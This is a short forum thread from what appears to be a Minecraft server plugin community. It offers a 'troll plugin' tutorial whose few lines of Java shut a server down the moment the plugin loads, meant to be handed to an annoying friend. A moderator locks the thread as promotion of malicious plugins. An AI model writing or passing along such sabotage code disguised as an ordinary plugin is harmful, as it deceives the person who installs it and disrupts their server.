[Tutorial] How to make a troll plugin!

Discussion in 'Resources' started by BaconStripzMan, Dec 26, 2013.

Thread Status:
Not open for further replies.
  1. Offline

    BaconStripzMan

    Got a friend that bugs you or annoys you? Give him a plugin with this code:

    Code:java
    1. public class Main extends JavaPlugin {
    2. @Override
    3. public void onEnable(){
    4. getServer().shutdown();
    5. }
    6. }
    7.  


    (Stops server as soon as it turns on :3)
     
  2. Offline

    Necrodoom

    Locked. Not a tutorial, just promotes malicious plugins.
     
    Garris0n, Cirno, ferrybig and 6 others like this.
Thread Status:
Not open for further replies.

Share This Page